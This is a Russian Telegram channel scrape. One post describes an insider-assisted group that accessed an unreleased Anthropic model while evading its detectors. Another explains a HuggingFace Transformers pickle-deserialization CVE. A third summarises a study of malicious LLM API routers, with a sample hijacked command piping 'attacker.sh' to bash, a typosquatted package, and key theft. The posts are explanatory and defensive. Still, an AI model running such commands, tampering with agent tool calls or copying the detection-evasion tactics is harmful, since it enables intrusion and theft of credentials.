Но есть и закрытое крыло. Меньше, тише, с дисциплиной оператора. С ботами, которые не просто читают публичные каналы, а ведут энумерацию URL. С готовностью использовать инсайдеров. В случае с Mythos этот инсайдер нашёлся. Bloomberg пишет, что человек с легитимным preview-доступом через стороннего подрядчика передавал группе учётные данные или, как минимум, помогал ориентироваться в preview-среде. Формально - не сотрудник Anthropic. Фактически - человек из доверенного периметра. Со слаженностью такого уровня, что, получив доступ к Mythos, они сознательно не запускают на нём атак - чтобы не попасть в детекторы Anthropic. Вместо этого на модели генерируют простые сайты, мимикрируя под настоящих preview-пользователей. Источник Bloomberg подтверждает: доступ у группы есть не только к Mythos, но и к другим невыпущенным моделям Anthropic.

Это уже threat actor в нормальном смысле. Без имени, без атрибуции, с продемонстрированной способностью удерживать доступ четырнадцать дней до раскрытия и инициировать это раскрытие самим - через слив в Bloomberg, а не через детекцию со стороны защитника.

Красивый парадокс всей истории в том, что Anthropic выстраивал Glasswing как контролируемый периметр. Сорок доверенных партнёров, усиленные SLA, NDA, $4M в защитный open-source-инструментарий. Периметр действительно выдержал на уровне собственной инфраструктуры компании. Но периметр никогда не заканчивается там, где заканчивается твоя серверная. Он заканчивается там, где заканчивается дисциплина у подрядчика твоего партнёра.

Или у CI-пайплайна в сканере уязвимостей, о котором ты даже не слышал.
5👍1442
Forwarded from OK ML
RCE в HuggingFace Transformers через чекпоинт

В уязвимости CVE-2026-1839 проблема скрыта в операции восстановления состояния генератора случайных чисел внутри Trainer. При resume обучения библиотека загружает файл rng_state.pth, используя torch.load() из PyTorch.

До версии 5.0.0rc3 загрузка происходила без ограничения weights_only=True, а значит 🤡 через стандартный pickle-механизм, который по своей природе способен выполнять произвольный код при десериализации (CWE-502).

Механизм атаки
Trainer при возобновлении обучения должен восстановить всё состояние процесса:веса модели, learning rate scheduler, состояние генератора случайных чисел (чтобы последовательность случайных чисел при продолжении обучения была такой же, как если бы обучение не прерывалось) и тд.

Для сохранения состояния RNG библиотека transformers создаёт файл rng_state.pth. Это просто файл, куда torch.save() записывает текущее состояние генератора.

Проблема в методе загрузки. Чтобы загрузить состояние обратно, используется torch.load(). Вот код из уязвимой версии (упрощённо):

with safe_globals([torch.random.get_rng_state]):
rng_state = torch.load(rng_state_path) #здесь всё и ломается идет не по плану


Если файл подменён, то 🧑‍💻внутрь можно положить объект с __reduce__, который выполнит произвольный код при torch.load().

Коварно то 😈, что разработчики попытались обернуть загрузку в safe_globals(), но в версиях PyTorch ниже 2.6 это не сработало: контекст просто превращается в nullcontext, т.е. защита фактически отсутствует.

Уязвимости через небезопасную десериализацию регулярно всплывают в ML. 😓 В Python-экосистеме это старая проблема, ведь pickle никогда не был безопасным форматом. 💩 Аналогичные истории уже происходили, например, в других частях Transformers TensorFlow-утилитах), где также использовалась небезопасная загрузка. Похожие классы уязвимостей встречаются и за пределами ML (но об этом в других каналах хаха 🌝).

В мире ML есть дополнительный фактор риска, так как чекпоинты активно распространяются и переиспользуются. Люди скачивают модели с форумов, из GitHub да отовсюду, не задумываясь о том, что файл .pth — потенциально исполняемый объект.
Фикс в CVE-2026-1839 👌 минималистичен, просто добавили weights_only=True, которое ограничивает десериализацию и блокирует выполнение произвольного кода. Но важен 👇

Вывод
Любая загрузка состояния в ML должна рассматриваться как недоверенный ввод. И если библиотека этого не делает по умолчанию, повод задуматься об ошибке всего мл-пайплайна.

Что еще хочется сказать разработчику мл-библиотек?

🤘 Никогда не используй torch.load() (и аналоги в TensorFlow: tf.keras.models.load_model) без weights_only=True для пользовательских файлов.
✌️ Всегда рассматривай любой загружаемый файл (модель, конфиг, чекпоинт) как недоверенный ввод.
👑 Внедряй проверки целостности (например, цифровые подписи) для официальных чекпоинтов (да и не для официальных, потому что дисциплина в этом деле очень важна!).

P.S. Уточню, что формат safetensors (разработанный Hugging Face) изначально безопасен, так как не выполняет код.

Все
🤘
Please open Telegram to view this post
VIEW IN TELEGRAM
👍321
великолепный пост, но в ближайшее время ждите и от меня интересного !!!!!
1
Forwarded from OK ML
Читаем! Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain
(По мотивам трека Дэвида Гетты)

Большинство LLM-агентов используют API-роутеры (например, LiteLLM, OpenRouter), которые по дизайну являются MITM и видят вообще все: промпты, tool calls, API-ключи, ответы и знают, что ты делал этим летом.

👉 В свежей статье Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain авторы проанализировали 28 платных роутеров и 400 бесплатных и получили следующие результаты: 9 роутеров внедряли вредоносный код, 17 — перехватывали креды (AWS, API keys), а один вообще реально украл ETH!

🤩 Основные атаки
1⃣ Payload injection
Роутер меняет tool call:
# было

curl https://safe.com/install.sh | bash

# стало

curl https://attacker.sh | bash

Агент выполняет и всё, у тебя RCE.

2⃣Secret exfiltration
Вообще ничего не меняется, просто читаются API-ключи, сохраняются и используются позже. Блаженно твое неведение.

3⃣ Dependency hijacking
Самое коварное
pip install requests

pip install reqeusts

Выглядит нормально? А это вредоносный пакет.

4⃣ Conditional attacks
Атака включается только после 50 запросов, только в YOLO mode и только для Rust/Go проектов. А тесты ничего не находят.

Полезно иногда проверять, через какие сервисы реально проходят ваши запросы.

Все
🍔

TL;DR
Если ты используешь LLM-агентов с tool calling:
😭 ты в supply chain
😭 ты доверяешь посредникам
😭 и зря
Please open Telegram to view this post
VIEW IN TELEGRAM
3532👍1